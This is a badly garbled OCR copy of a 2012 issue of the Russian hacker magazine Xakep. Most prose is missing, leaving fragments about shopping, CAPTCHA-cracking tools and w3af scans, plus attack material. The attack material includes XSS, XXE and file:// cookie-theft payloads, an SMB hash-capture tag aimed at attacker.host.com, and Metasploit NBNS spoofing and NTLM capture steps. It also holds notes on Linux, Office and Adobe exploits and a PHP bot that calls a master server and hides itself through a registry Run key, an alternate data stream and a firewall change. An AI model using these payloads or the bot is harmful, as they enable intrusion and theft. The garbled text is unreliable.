40 000 - 80 000 *
Flash-
40 000 - 80 000
40 000 - 80 000 *
Game producer
40 000 - 70 000
40 000 - 90 000 *
PRUFFI (www.pruffi.ru/analitika)
GAME
50%
50%
50%
03 /158/ 2012
035
Preview
33 .
.
PCZONE
38
?
,
-?
eBay!
.
.
.
,
.
-
.
PC ZONE
I can
crack
it!
42
CAPTCHA.
, OCR-?
70
036
--
,
.
48
, ,
, ,
IDS ,
w3af.
66
MALWARE
76
2011
.
?
82
Windows Phone 7.5
. ?
Microsoft.
03 /158/ 2012
PC ZONE
(biohedge@gmail.com)
?
Android?
? , , ?
? ,
, ,
-. , ,
.
MADE IN CHINA
Made in China
, .
, ,
. ,
DealExtreme.com,
.
.
038
,
, .
,
.
,
, ,
-
, . ,
, . ?
03 /158/ 2012
FocalPrice.com
:
:
( )
:
14 25
70 000 100 (, ). , .
, ,
, .
( ),
( , ).
, , .
, eBay (-,
,
). ,
-.
,
, - ,
.
,
,
.
,
, .
,
, .
PayPal.
FocalPrice
WebMoney, .
,
,
.
, ,
.
, , , . ,
. $20,
- .
, , ,
: , , .
1. .
: retailmenot.com (,
), chinaprices.ru, . ,
< >.
2. ,
. searchsku.ru
. chinaprices.ru.
3. ,
. . , .
, ebay-forum.ru mySku.ru.
4. - (, , )
.
.
5. .
PayPal. WebMoney Qiwi, ,
, PayPal
.
6. , . ,
. , ,
- .
03 /158/ 2012
PayPal
WebMoney
Qiwi
039
PC ZONE
Dealextreme.com
:
:
:
21 40
DealExtreme.com.
- .
:
, , ,
, . :
. ,
. ,
. TinyDeal,
,
.
PayPal ,
.
-,
$15.
, :
Dealextreme ,
: ( ),
.
: .
,
, ,
().
. PayPal, WebMoney. ,
PayPal
, .
$150.
.
, ,- (, ,
). -
$35,
: ,
-
$20.
$2-3.
,
.
: , , -
,
.
Tinydeal.com
:
:
:
7 25
- ,
,
.
, ,
. -,
,
. ,
.
,
(5-7%). (
TD Points),
.
$200
-
040
03 /158/ 2012
Pandawill.com
:
:
:
25 35
-, . , ,
. , .
,
, .
(
).
Pandawill
, ,
.
.
PayPal Visa Master Card,
. . , ,
-:
$50 (
).
:
,
.
NOWSUPPLIER.COM
MERIMOBILES.COM
BUYINCOINS.COM
7 25
,
:
,
( $30 )
.
, ,
-
. , PayPal
, .
,
,
.
.
,
03 /158/ 2012
14 25
7 25
-
. ,
.
, 3G-
.
, PayPal ,
.
(, ,
) ,
.
.
.
,
FocalPrice
TinyDeal.
.
:
.
,
PayPal.
. :
- ,
. -
, .
: , , .
! z
041
PC ZONE
( gursev.kalra@foundstone.com )
CAPTCHA
CAPTCHA,
. -,
,
$1
1000 .
,
.
.
042
CAPTCHA
CAPTCHA
.
, , .
(,
, , ),
.
, ,
CAPTCHA: . ,
-
TESSERCAP
? ,
CAPTCHA
.
, ,
,
. -
CAPTCHA- TesserCap
03 /158/ 2012
, ,
, OCR-
,
. ,
,
McAfee. ?
,
.
-,
www.quantcast.com/top-sites-1.
, Wikipedia, eBay,
reCaptcha.
,
.
,
OCR-,
. TesserCap
:
1. ,
.
2.
Tesseract , CAPTCHA-.
3.
.
, ,
, .
,
.
, ,
.
. MAIN
: Main, Options,
Image Preprocessing.
,
CAPTCHA-, ( ,
),
.
URL- URL, -
. URL- :
CAPTCHA-,
URL- src <img>. , xakep.
ru www.xakep.ru/common/rateit/
captcha.asp?name=xakep.ru. ,
,
.
12 ,
. ,
. Start
Stop .
TesserCap.
.
Foundstone,
McAfee.
, ToorCon, NullCon ClubHack.
TesserCap SSLSmart.
,
.
Ruby, Ruby on Rails C#.
03 /158/ 2012
xakep.ru
. ,
Foundstone, ,
,
.
,
.
,
. ,
,
, .
,
Send To Image Preprocessor.
. OPTIONS
TesserCap.
OCR-,
-, , HTTP,
: ,
, ,
.
.
, OCR-.
Tesseract-ORC,
.
. , , xakep.ru , ,
. ,
? ,
,
xakep.ru ,
: Numerics.
Upper Case? ,
? , . , , ,
\Program Files\Foundstone
Free Tools\TesserCap 1.0\tessdata\configs\.
:
Numerics Lower Case,
lowernumeric, tessedit_char_whitelist.
043
PC ZONE
,
.
,
.
,
Http Request Headers. , - ,
. TesserCap
,
HTTP
, Accept, Cookie Referrer
. . - (Fiddler, Burp,
Charles, WebScarab, Paros . .),
Http Request
Headers. , , Follow Redirects.
, TesserCap
.
URL-
,
.
, / ,
.
.
CAPTCHA-
. CAPTCHA-,
Enable
Image Preprocessing,
OCR- Tesseract
.
. IMAGE
PREPROCESSING
.
,
.
.
.
, ,
.
.
1.
CAPTCHA-. ,
, ,
:
for(each pixel in CAPTCHA)
{
if (invertRed is true)
new red = 255 current red
if (invertBlue is true)
new blue = 255 current blue
if (invertGreen is true)
new green = 255 current green
}
CAPTCHA-.
2.
CAPTCHA
Wikipedia
2030%
Ebay
2030%
reddit.com
2030%
CNBC
>50%
foodnetwork.com
8090%
dailymail.co.uk
>30%
megaupload.com
>80%
pastebin.com
7080%
cavenue.com
>80%
.
257
( -1 255) . RGB
:
1. -1,
.
2. -1,
(, )
. 0
, 255
. .
3. ( )
.
, .
,
:
1. Average (Red + Green + Blue)/3.
2. Human (0.21 * Red + 0.71 * Green + 0.07 *
Blue).
3. Average of minimum and maximum color
components (Minimum (Red + Green + Blue)
+ Maximum (Red + Green + Blue))/2.
4. Minimum Minimum (Red + Green + Blue).
5. Maximum Maximum (Red + Green + Blue).
CAPTCHA
.
044
4.
CAPTCHA-,
03 /158/ 2012
, .
,
Bucket Cutoff.
Passes ,
.
. :
.
TesserCap .
( ).
.
.
,
Save Mask. ,
03 /158/ 2012
.
Save Mask .
5.
.
20 (bucket)/.
,
0 12, 0,
,
13 25,
1 . .
,
:
1. (Leave As Is).
2. (White).
3. (Black).
, / ,
.
6. (cutoff)
.
:
if (pixels grayscale value <= Cutoff)
pixel grayscale value = (0 OR 255)
-> ,
(<= => : Set Every Pixel
with value <=/=> Threshold to 0.
Remaining to 255)
CAPTCHA
.
7: (chopping)
, , bucket- CAPTCHA
, .
045
PC ZONE
: ,
,
, 0 ()
255 () .
CAPTCHA , .
,
.
OCR-.
8: .
,
TesserCap ,
, CAPTCHA-
CAPTCHA,
OCR .
.
, ,
.
10:
CAPTCHA-
OCR- .
Solve
, OCR-
.
, ,
.
(Enable Image Preprocessing)
.
9:
-
046
, ,
, - .
xakep.ru.
,
. ,
, . , (
, )
. , ,
. URL
TesserCap. , 12
, Start.
12 . ,
,
-Failed- ,
. , ,
. .
12
03 /158/ 2012
(Send To Image
Preprocessor).
12 , , , ,
(Character Set = Numerics).
Image Preprocessing
. ,
( , ,
) ,
. Smooth Mask
2
. Grayscale buckets
. 154 , ,
, 0, ,
, 255.
, chopping 10.
,
Solve.
714945,
711435.
03 /158/ 2012
, , .
, ,
.
pastebin.
com, .
xakep.ru,
(Enable Image Preprocessing).
Main , Start,
, . , ,
/ ( Mark as Correct/Mark as
InCorrect). Show Statistics. -,
CAPTCHA. , TesserCap
.
CAPTCHA-
- .
. ,
CAPTCHA-, ,
. ,
,
reCaptcha .
,
,
CAPTCHA.
API , .
(, ), .
:). z
047
PC ZONE
(oxdef@oxdef.info)
-
- W3AF
WARNING
.
.
w3af
-.
, ,
,
.
W3AF?
- , . , , ,
,
. , ,
. , -:
1. .
2. ().
3. .
4. .
w3af (w3af.org).
- (Web Application
Attack and Audit Framework),
.
.
, :).
,
Rapid7 ! Python, ,
, . w3af
, . , ,
Mozilla Firefox, .
W3AF?
w3af
048
w3af : .
,
03 /158/ 2012
w3af
. , ,
.
, , .
.
. W3af , .
,
. , , .
1. (
discovery-) ,
, -. . -,
webSpider. Discovery- , , , .
,
, .
2. - (
) , , XSS, SQL-, (R)LFI
.
3. Grep- , , UNIX-, . :
grep- HTTP-/,
(
, IP-,
. .).
JavaScript-, :
document.write
document.location
eval
...
03 /158/ 2012
- .
UNIX,
sed, HTTP-. hidden- ? !
7. Evasion- IDS. -?
- .
8. Output- : w3af. ,
PDF, - .
9. Auth- : -,
, ,
-.
.
-,
, . , w3af
,
. w3af
auth-, .
, ,
:
SMS, .. Python!
-
, w3af,
. ,
Itter. ,
, , , ,
140 . :)
- :
LAMP (Linux-Apache-MySQL-PHP);
;
;
AJAX;
, , !
- . w3af (,
, ) :
gtkUi , GTK;
consoleUi UI (
, ).
. GUI- ./w3af_gui - 1. :
, , . .
049
PC ZONE
w3af
- w3af
, ,
w3af. , ini-,
w3af, URL, , core-
. , Itter
My Profile, discovery webSpider pykto ( Nikto Python),
grep- DOM XSS
XSS- SQL-. , Start
, . , w3af Log,
. -
.
20 . ,
w3af.
DOM XSS, XSS!
, /index.php, , . Pykto, ,
Apache phpinfo- /test.php.
-
-. Apache/2.2.16 Debian GNU/
Linux PHP. ,
-, URLs -
. HTTP-,
.
2.0
,
-.
-,
JavaScript, AJAX, JSON, HTML5 .
:)
-.
.
- /article.php?id=68,
, , ,
-. , , <Ctrl-U>,
HTML-,
JavaScript HTML.
-, .
-. ,
JS -? ,
Selenium/WebDriver?
, OWASP WebScarab Burp
050
spiderMan, ,
, discovery-.
. . - 127.0.0.1:44444
( FoxyProxy Firefox,
). SpiderMan
webSpider,
. spiderMan , -. Log- :
[Mon 30 May 2011 12:08:22 AM MST] spiderMan proxy is running
on 127.0.0.1:44444.
Please configure your browser to use these proxy settings and
navigate the target site. To exit spiderMan plugin please
navigate to http://127.7.7.7/spiderMan?terminate .
[Mon 30 May 2011 12:15:29 AM MST] The user is navigating
through the spiderMan proxy.
[Mon 30 May 2011 12:15:29 AM MST] Trapped fuzzable requests:
[Mon 30 May 2011 12:15:29 AM MST] http://localhost/index.php
| Method: GET
[Mon 30 May 2011 12:15:32 AM MST] http://localhost/user-info.
php | Method: GET
[Mon 30 May 2011 12:22:36 AM MST] SQL injection in a MySQL
database was found at: "http://localhost/user-info.php",
using HTTP method GET. The sent data was: "id=d'z"0".
This vulnerability was found in the request with id 3911.
[Mon 30 May 2011 12:27:10 AM MST] Cross Site Scripting was
found at: "http://localhost/index.php", using HTTP
method GET. The sent data was: "limit=15&u=<ScRIPT>
a=/UzmE/%0Aalert(a.source)</SCRiPT>". The modified parameter
was "u". This vulnerability affects ALL browsers. This
vulnerability was found in the request with id 4042.
, spiderMan, , webSpider
. , - SQL XSS-! , AJAX-,
.
. W3af
, ,
. -
03 /158/ 2012
HTTP-
: Telnet, cURL, Wget, Python + urll ib,
, :) , . w3af
.
HTTP- ? !
Python. HTTP-,
HTTP-,
.
- URL MD5. , echo -n "admin" | md5sum
, . SQL-
-,
diff. , , ,
,
HTML, AJAX Python. , : , ,
JS-
. -
( ).
History HTTP . , , .
:
, , , 2xx- .
.
,
.
AJAX-
/user-info.php?id=1, . .
Audit request with... , SQL-.
03 /158/ 2012
SQL-
! SQL-. :) , ,
.
. PHP
, . HTTP-
-: /user-info.php?id=1 /user-info.
php?id=1%2b1,
. SQL-
,
( ).
.
OUTRO
W3af
-. ,
.
, ,
, .
, Python,
.
, , w3af , .
,
(w3af.sourceforge.net) IRC- #w3af
Freenode. z
w3af HTTP-
051
/ EASY HACK
EASY
HACK
MSSQL
052
1.
2.
3.
4.
, : ENCRYPT_OFF 0x00.
: ENCRYPT_ON 0x01.
: ENCRYPT_NOT_SUP 0x02.
: ENCRYPT_REQ 0x03.
ENCRYPT_OFF. , ,
. ENCRYPT_NOT_SUP,
. ,
MiTM- ,
,
.
,
Metasploit Framework,
. , , . ,
TCP-,
MSSQL- ,
, , , . ,
, ,
arp-spoofing-,
. f0rki ,
shell-.
03 /158/ 2012
EASY HACK
UI-REDRESSING
][ ,
clickjacking. ,
. clickjacking
, , uiredressing . ,
, .
, cookiejacking.
Rosario Valotta HITB 2011
. , , HTTPS-! :
IE ( ).
, -.
-, 0-day,
IE. ,
. , IE
, : Internet, Intranet,
. .
, NTLM-
Intranet . , :
Local Machine Zone
Local Intranet Zone
Trusted Sites Zone
Internet Zone
Restricted Sites Zone
- . ,
. , <iframe
src="file://c:/boot.ini">
.
0-day , -
,
. ,
:
<iframe src="file:///C://Documents and Settings/
%user_name%/Cookies/%user_name%@google[1].txt"> </iframe>
%user_name% .
, . , Google,
.
-, 0-day-,
clickjacking' content extraction ( BlackHat Europe 2010, goo.gl/Z8YNw).
? iframe ,
.
- , - ,
iframe localhost .
. drag & drop,
.
, , ,
. -
. , content extraction , ,
drag & drop. clickjacking-
, , , .
03 /158/ 2012
( Rosario )
(). iframe ,
.
. iframe scrollspeed
. , ,
, () iframe
. , ,
iframe,
, drag & drop', . ,
, Rosario Valotta
(bit.ly/iNxvTb), , , content extraction, JavaScript.
, .
. -,
Windows, :). XP
Vista/7 . XP C://Documents and
Settings/%user_name%/Cookies,
C:/Users/% user_name %/AppData/Roaming/Microsoft/Windows/
Cookies. , ,
User-Agent, .
,
JavaScript. -, , , ,
, .
SMB.
.
: <img src="\\attacker.host.com\any.jpg"></img>.
,
445 , web. , !
.
. 2012-, Microsoft
IE 2011-. ,
Microsoft
.
user_name@domain[counter].txt 87TVLBDW.txt.
. , ,
, IE.
053
/ EASY HACK
( ).
. ,
, ?
, .
,
.
,
,
. , makensi.es/stf.
-,
, , .
WordPress
DNS NETBIOS
, IP-
DNS.
( ),
. DNSSEC,
, . DNS ,
arp-poisoning,
,
. ,
- , . , , IDS, , -
. ,
.
. , XXX.COM. , , ,
Windows IP- .
IP , hosts (C:\Windows\System32\drivers\etc\hosts). ,
URL
054
03 /158/ 2012
EASY HACK
NBNS-
, .
NBNS-.
Transaction ID NBNS-. ,
, , ,
. , MSF
. :
1. NetBIOS-: use auxiliary/spoof/
nbns/nbns_response.
2. : Set REGEX *google*.
3. , IP- : set spoofip xa.kep.
IP.address.
4. : run.
. (Tim Medin)
(goo.gl/Jz2Q9), NTLM-.
, ,
( makaka), (makaka.
com). Windows ( !). IE ,
. , . ,
NTLM- HTTP ( SMB):
1. : use auxiliary/server/
capture/http_ntlm.
2. , : set URIPATH.
3. , -: set SRVPORT 80.
4. : run.
. , NBNS-,
- .
c XXX.com, - ,
( JavaScript),
XXX.com. XXX.
com, ,
DNS NBNS. ,
, -
.
,
.
:
1. NBNS- .
2. web-
( ) , XXX.com (, asdasdasd.XXX.com).
3. , - , NBNS .
4. asdasdasd.XXX.com, , ,
NBNS.
5. XXX.com asdasdasd.XXX.com,
.
,
. ,
(XXX.com),
(.XXX.com).
LOCALHOST WINDOWS
localhost
127.0.0.1. ? , IE, , Windows. , Python urllib2
. , ,
(127.0.0.1)
(0.0.0.0).
- , Eldar Marcussen. ,
03 /158/ 2012
IE .NET framework
localhost 127.0.0.1. IE9
, -localhost.
, -, . -,
IP 127 , ,
127.1.2.3,
. -,
hosts (%windir%\drivers\etc\hosts)
localhost: 127.0.0.1 localh0st.
055
(ivinside.blogspot.com)
(115612, . , .1)
Linux,
, Microsoft Office Acrobat
Reader, XXE- phpMyAdmin.
!
056
Linux
CVSSV2
6.8
(AV:L/AC:L/AU:S/C:C/I:C/A:C)
BRIEF
/proc/<PID>/mem ( <PID>
), Linux
.
2.6.39 #ifdef,
, ,
.
, .
, .
, : ,
2.6.39,
.
03 /158/ 2012
int match;
rcu_read_lock();
match = (ptrace_parent(task) == current);
rcu_read_unlock();
if (match && ptrace_may_access(task,
PTRACE_MODE_ATTACH))
return mm;
EXPLOIT
/proc/<PID>/mem :
static int mem_open(struct inode* inode, struct file* file)
{
file->private_data = (void*)((long)current->self_exec_id);
file->f_mode |= FMODE_UNSIGNED_OFFSET;
return 0;
}
,
. . , ( ):
static ssize_t mem_write(struct file * file,
const char __user *buf, size_t count, loff_t *ppos)
{
/* ... */
struct task_struct *task = get_proc_task(
file->f_path.dentry->d_inode);
/* ... */
mm = check_mem_permission(task);
copied = PTR_ERR(mm);
if (IS_ERR(mm))
goto out_free;
/* ... */
if (file->private_data != (void *)((long)
current->self_exec_id))
goto out_mm;
/* ... */
: check_mem_permission self_exec_id.
check_mem_permission __check_
mem_permission, :
static struct mm_struct *__check_mem_permission(
struct task_struct *task)
{
struct mm_struct *mm;
mm = get_task_mm(task);
if (!mm) return ERR_PTR(-EINVAL);
if (task == current) return mm;
if (task_is_stopped_or_traced(task)) {
}
mmput(mm);
return ERR_PTR(-EPERM);
}
,
(task == current), , ptrace. ptrace ,
task == current.
? , suid. su:
$ su "yeeeee haw I am a cowboy"
su: user yeeeee haw I am a cowboy does not exist
, stderr ,
. , /proc/<PID>/mem,
lseek() , dup2()
/proc/<PID>/mem, ,
-. . , self_exec_id
, /proc/<PID>/mem. self_exec_id
,
.
, : fork() exec() .
self_exec_id,
. exec(), self_exec_id .
/proc/<PID >/mem,
. su
exec(), self_exec_id.
, ,
dup2 -> exec.
, . , ASLR
, :
$ readelf -h /bin/su | grep Type
Type:
EXEC (Executable file)
03 /158/ 2012
057
MS12-005
CVSSV2
9.3
(AV:N/AC:M/Au:N/C:C/I:C/A:C)
BRIEF
.
web- Office.
Object Packager.
, Object Packager ClickOnce- ,
Office.
, . , ClickOnce
, Windows, .
ClickOnce: -,
, -.
, ,
, -
. ClickOnce
,
.
PowerPoint. Custom Animation OLE-.
,
OLE ( Object Actions): Activate
Contents ( ) Edit Package (
). Activate Contents ,
.
, Custom Animation -
,
ClickOnce- (Full Trust).
.
. Custom Animation ,
PowerPoint . PowerPoint , .
ClickOnce-
, .
EXPLOIT
, MS12-005, :
1. .
packager.dll , ,
( execExtTable).
.text:02FA1D98
; DATA XREF:
.text:02FA1D98
.text:02FA1D98
.text:02FA1D9C
.text:02FA1DA0
.text:02FA1DA4
.text:02FA1DA8
.text:02FA1DAC
.text:02FA1DB0
.text:02FA1DB4
.text:02FA1DB8
.text:02FA1DBC
.text:02FA1DC0
.text:02FA1DC4
.text:02FA1DC8
.text:02FA1DCC
.text:02FA1DD0
Python-
058
03 /158/ 2012
,
, .
IsProgIDInList:
.text:02FA72F4 push 11h ; int
.text:02FA72F6 push offset execExtTable ; dangerousTable
.text:02FA72FB push esi ; pExtName
.text:02FA72FC push 0 ; int
.text:02FA72FE call ?IsProgIDInList@@YGHPBG0PBQBGI@Z
; IsProgIDInList(ushort const *,ushort const *,
; ushort const * const *,uint)
,
.
py pl. MS12-005 AssocIsDangerous(),
:
A , .
PO , , 3D-.
EXPLOIT
2. .
packager.dll ,
. CPackage___
GiveWarningMsg(HWND hWnd).
execExtTable, ,
execExtTable, .
TARGETS
, .
Adobe Reader
U3D-
CVSSV2
3D- pdf-
10.0
(AV:N/AC:L/Au:N/C:C/I:C/A:C)
:
4 OpenAction
JavaScript.
14 JavaScript 15.
15 JavaScript- heap spraying,
.
11 3D- .
10 3D-, (,
).
, :
10 (/3D, /U3D).
11 (/3DI, /3DD, /3D,
/3DA).
15 JavaScript- heap
spraying (
3D-).
Metasploit (
):
BRIEF
U3D-.
.
. DEP ROP-,
icucnv36.dll. ASLR JavaScript-, heap spraying.
U3D-, ,
:
U3D 3D-.
3DD () 3D-,
.
3DA () , ,
3D-.
3DI () , . true
, false JavaScript.
DIS () , 3D-
.
03 /158/ 2012
process
yes
Description
----------The command string to
execute
Exit technique:
seh,thread,process,none
059
/
Exploit target:
Id Name
-- ---0
Adobe Reader 9.4.0 / 9.4.5 / 9.4.6 on Win XP SP3
msf exploit(adobe_reader_u3d) > exploit
[*] Creating 'msf.pdf' file...
[+] msf.pdf stored at /home/pikofarad/.msf4/local/msf.pdf
, .
CVSSV2
>
<foo>&bar;</foo>
bar, /etc/
passwd,
. , XML-
.
, . :
TARGETS
[
<!ELEMENT foo ANY >
<!ENTITY bar SYSTEM "file:///etc/passwd" >
]
5.0
(AV:N/AC:L/Au:N/C:P/I:N/A:N)
BRIEF
Marco Batista
Local File Including.
, XXE- (XXE XML eXternal Entity),
XML-.
, XML- (, GET -) XML.
xmlDB, :
<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
<user>
<username>gandalf</username>
<password>!c3</password>
<userid>0</userid>
<mail>gandalf@middleearth.com</mail>
</user>
<user>
<username>Stefan0</username>
<password>w1s3c</password>
<userid>500</userid>
<mail>Stefan0@whysec.hmm</mail>
</user>
<user>
<username>tony</username>
<password>Un6R34kb!e</password>
<userid>500</userid>
<mail>s4tan@hell.com</mail>
</user>
</users>
phpMyAdmin
XML-. , XML- ( -)
.
libraries\import\xml.php,
simplexml_load_string() :
$xml = simplexml_load_string($buffer,
"SimpleXMLElement", LIBXML_COMPACT);
phpMyAdmin
libxml_disable_entity_loader(), XML-.
SECFORCE Metasploit . LFI :
1. phpMyAdmin .
2. XML-, XXE-
.
3. XML-.
4. .
.
TARGETS
060
03 /158/ 2012
>> coding
|qbz| (http://essenzo.net)
PHP-
Windows
.
- C, ASM, - Python. ,
,
PHP. ,
,
.
,
,
- .
WWW
bit.ly/WdbrO
;
3.14.by/ru/md5
;
www.f2ko.de
.
DVD
,
.
062
03 /158/ 2012
PHP- Windows
. ,
? ,
, , . , php2exe-.
. , , . , ,
.
, ,
. , , ,
, .
, .
. ,
,
.
, ,
.
, . ,
, ,
(), .
,
, exe,
.
:
md5. { } { } { }
( = ),
, ,
. ,
, ,
- .
:
03 /158/ 2012
function mySettings()
{
$settings = file_get_contents(
'http://adres.com/?do=mysettings');
if ($settings != '')
{
list($status, $statusdata) =
explode('|', $settings, 2);
$config = array('status' => $status,
'data' => $statusdata);
return $config;
}
else
return false;
}
, , ,
, , |.
, .
():
function bruteHashes($hashes)
{
//
file_put_contents('./brute.txt', implode("\r\n", $hashes));
// ,
file_get_contents(
'http://adres.master.servera.com/?do=iamworking');
//
passthru('md5.exe brute.txt vocabulary.txt results.txt');
//
$uploader = ftp_connect('ftp://adres.master.servera.com');
ftp_login($uploader, 'login', 'password');
ftp_put($uploader, './results/'.time().'.txt',
063
'./results.txt', FTP_ASCII);
ftp_close($uploader);
// ,
file_get_contents(
'http://adres.master.servera.com/?do=iamfinished');
}
,
,
,
. ,
. ,
,
(- ), , .
, ,
. .
, :
function installVocab()
{
$vocabulary = file_get_contents(
'http://adres.com/unique_vocabulary.php');
file_put_contents('./vocabulary.txt', $vocabulary);
}
. , ,
,
:
, , ,
.
,
-.
,
-.
,
( ):
brute ;
clean ,
;
install ;
exit .
.
- 300 .
.
, , ( )
if (!file_exists('./vocabulary.txt'))
{
installVocab();
}
startScheduler();
, ,
exe. Bambalam PHP EXE
Compiler/Embedder.
, exe PHP. , , ( !).
PHP 4.0,
. Bambalam :
bamcompile [-options] infile.php [outfile.exe]
PHP DevelStudio
bit.ly/amiS4r
PHP
.
,
,
.
064
Php2exe
bit.ly/ylV4vR
PHP
.
,
php5ts.dll.
Bambalam Embedder
bit.ly/wpSniZ.
,
GUI
.
,
cURL.
py2exe
bit.ly/3KkIKw
,
, .
,
,
.
Perl2Exe
bit.ly/y29qTB
exe.
,
.
03 /158/ 2012
PHP- Windows
MD5-
, . . -,
,
, , , .
IP- (
,
, ,
NAT), ,
.
. , , ,
lastcallback. , ,
. ,
.
300 (
), ,
. . ,
, , , , |.
, ,
,
. ,
- install|vocab_123123123.txt, install
, vocab_123123123.txt
, .
, , clean. brute.
:
results,
.
.
-, ,
, ,
, .
,
: %CD%\bot.exe.
BAT To EXE Converter 1.5
, invisible
application include : bot., (php5ts.dll) (md5.exe).
, . , .
. , , attrib
'+h' '+s'. :
attrib "%CD%\bot.exe" +h +s
.
NTFS :
cd %systemroot%\system32
type packed_bot.exe>calc.exe:b0t.exe
:
brute|c4ca4238a0b923820dcc509a6f75849b:
c81e728d9d4c2f636f067f89cc14862c:eccbc87e4b5ce2fe28308f
d9f2a7baf3
FTP-,
, .
results.
, iamfinished.
cd "%systemroot%\system32
start .\calc.exe:b0t.exe
FTP.
Windows , :
passthru('netsh firewall add allowedprogram %WINDIR%\
system32\ftp.exe TCPInfrastructure>nul 2>&1 ');
exe ( , ,
%systemroot%):
passthru('reg add HKLM\software\microsoft\windows\
currentversion\run /v WinUpdate /t REG_SZ /d
%WINDIR%\packed_bot.exe /f>nul 2>&1');
03 /158/ 2012
PHP , .
,
, , ,
. z
065
I can
crack
it!
-,
][-,
. , ,
.
066
DVD
Can You
Crack It?.
03 /158/ 2012
,
,
,
.
, (GCHQ)
Google, ,
, .
FIRST STEP
,
canyoucrackit.co.uk,
HEX- ( ) - Can
You Crack It?. HEX-,
, ,
ASCII,
.
HEX-
IDA Pro.
- . IDA
x86. ,
.
, .
256 ,
0 255,
,
RC4
8 0xDEADBEEF ( ).
, ,
.
, esp,
,
, ,
0xAAAAAAAA.
DWORD, 0xAAAAAAAA.
,
0xBBBBBBBB.
( ) .
, ,
.
iTXt PNG- ( UTF-8).
Base64
Comment ( ).
, ( )
,
:
GET /15b436de1f9107f3778aad525e5d0b20.js
HTTP/1.1
GET .
, . exe-,
,
( IDA)
:
__asm
{
int 3;
mov eax, array; array
call eax;
}
, jmp ( ) .
. , .
PNG- -
. PNG,
(
).
SECOND STEP
.
,
,
.
, (r0...
r3) ,
(cs ds ), -
UNIX CRYPT()
crypt *nix
,
.
DES (Data
Encryption Standard).
,
, , 7 .
7 56-
DES,
.
DES . .
,
25 .
, crypt ,
DES.
.
12 .
Base64.
keygen
03 /158/ 2012
067
(flg),
(ip).
, (
hlt, )
: mod 0 mod 1. ,
, ,
.
.
, cs ds . , ,
add r[5], 12, ,
,
(
So you did it
cs,
r5).
far jump ip.
, , ,
, ip
.
.
JavaScript, ,
,
. C.
,
, , :-).
(
hlt)
GET:
GET /da75370fe15c4148bd4ceec861fbdaa5.exe
HTTP/1.0
THIRD STEP
GET- , .
,
Cygwin. ,
,
keygen.exe,
.
. keygen URL
. :
licence.txt, ,
.
,
Stage one licence key Stage two licence key,
,
.
-
,
,
. .
,
,
,
,
.
,
,
,
068
- .
, ,
, ,
,
,
.
,
mov, movzx, add, xor, shl, shr
. ., (
).
,
,
.
,
.
(SBox'), ,
,
(
), ,
() . .
-.
,
.
,
(key schedule) /
.
(
key shedule
).
03 /158/ 2012
,
, .
crypt ( Cygwin)
. ,
, ,
. IP
(URL ) DNS.
, URL :
canyoucrackme.co.uk. keygen.exe GET- :
GET-
:
key.txt,
So you did it
, ,
,
,
, ,
.
SUMMARY
GET /%s/%08X/%08X/%08X/key.txt HTTP/1.0
, - .
,
,
.
,
jump.
DWORD- firmware ( ).
,
,
7z, . , , ,
, .
RC4
GET /hqDTK7b8K2rvw/A3BFC2AF/D2AB1F05/
DA13F110/key.txt HTTP/1.0
,
-
.
,
. , GCHQ
, everyday heroes, ,
.
.
. z
RC4 ( ARC4)
.
,
RSA Security, 1987 . RC4 ,
.
8
,
0 255 (S)
: i j. RC4 :
(KSA)
. S
40 256 . KSA
:
for i from 0 to
S[i] := i
endfor
j := 0
for i from 0 to
j := (j + S[i]
mod 256
swap values of
endfor
255
255
+ key[i mod keylength])
S[i] and S[j]
.
:
i := 0
j := 0
while GeneratingOutput:
i := (i + 1) mod 256
j := (j + S[i]) mod 256
swap values of S[i] and S[j]
K := S[(S[i] + S[j]) mod 256]
output K
endwhile
AES
03 /158/ 2012
RC4
SSL,
WEP, Adobe PDF
Microsoft Office. ,
. ,
PDF- RC4
40 ,
.
MS Office -
RC4
069
life4u
:
SMS
INFO
-.
,
.
30 !
-
?
,
SMS, ?
?
070
03 /158/ 2012
SMS: 30 !
? -
, .
, - ,
,
(,
1234).
SMS, -
, .
,
,
. SMS-
SMS-.
,
. SMS
( WebMoney .)
:
(,
) ,
-. SMS
. , , ,
, , -
?
, ,
,
. ,
? ,
.
,
, ,
(
, -!)
,
03 /158/ 2012
.
, ,
.
?
, , ,
.
,
.
(,
,
,
,
),
.
.
,
,
,
.
071
SMS-.
50%
, , , . ,
( , ).
SMS- ,
,
, .
(,
, . .), / (, ,
, -
. .).
.
,
SMS-,
web-
.
,
.
.
SMS-.
, , , . , , .
,
. SMS-
(, ,
),
. ,
.
, (,
).
- (,
) ,
, , , -
depositfiles
072
?
,
.
.
-
,
, - .
,
.
,
(,
),
IP-
,
.
,
.
, , ,
, , ,
,
!
, . SMS- ,
.
( ).
24 , ,
(
,
).
? ,
, , .
50
, ? , ,
( ,
, ).
, ,
,
.
. , -
,
- , ,
?. , ,
SMS,
,
,
.
,
? ? .
,
, .
,
,
?
?
, .
, 1. , ,
( ,
, , ). , .
? , :
,
.
, , , , .
, ,
! , :
.
, ,
, ,
!
,
, -
. ,
, ,
-, ,
03 /158/ 2012
SMS: 30 !
. ,
, !
(welcome back,
!). OK,
, .
.
2.
,
,
.
, ,
,
, ,
.
!
,
,
.
. ,
.
:
?
100 . ,
,
,
.
, ,
-
, ,
( ?)
.
, ,
,
.
, ,
.
.
! , ,
,
.
: http://
loh.ru/?pid=15991&subid=25483.
, . ,
, -
,
.
,
,
,
(
][),
.
. , ,
.
, , .
, ( ).
.
SEO-
. SEO-
, .
.
, , ,
, . .
. (
,
). , ! z
Jinconvert.ru .
: , ,
, ,
. , ! , ,
, 5 %
-.
03 /158/ 2012
Loadpays.ru ,
,
-.
.
,
.
Convert-plus.ru ( info-center.
cc) ,
,
. .
073
X-Tools
:
NEOx.
URL:
bit.ly/xSLk8n.
:
Windows.
:
famatech.
URL:
radmin.ru/products/
ipscanner.
:
Windows.
:
Suicide[Vll].
URL:
r00t.in/showthread.
php?t=18056.
:
Windows.
PE TOOLS
ADVANCED IP SCANNER
DEATH-MOBILE
- Radmin,
Advanced IP Scanner.
, .
:
1. .
, , , HTTP, HTTPS FTP,
.
2. Radmin. Radmin,
Radmin Server
. ,
,
Radmin Viewer.
3. .
.
4. Wake-On-LAN.
, Wake-On-LAN.
.
SMS,
. 75 120 . ,
, , , .
Mail.Ru. 100 300
.
,
. :
074
mymegaemail@mail.ru:passw
login@bk.ru:pass
, ,
. Death-Mobile
(, , ),
, ,
,
.
.
03 /158/ 2012
X-Tools
:
al-chemist.
URL:
al-chemist.ru/
dnfinder.html.
:
Windows.
:
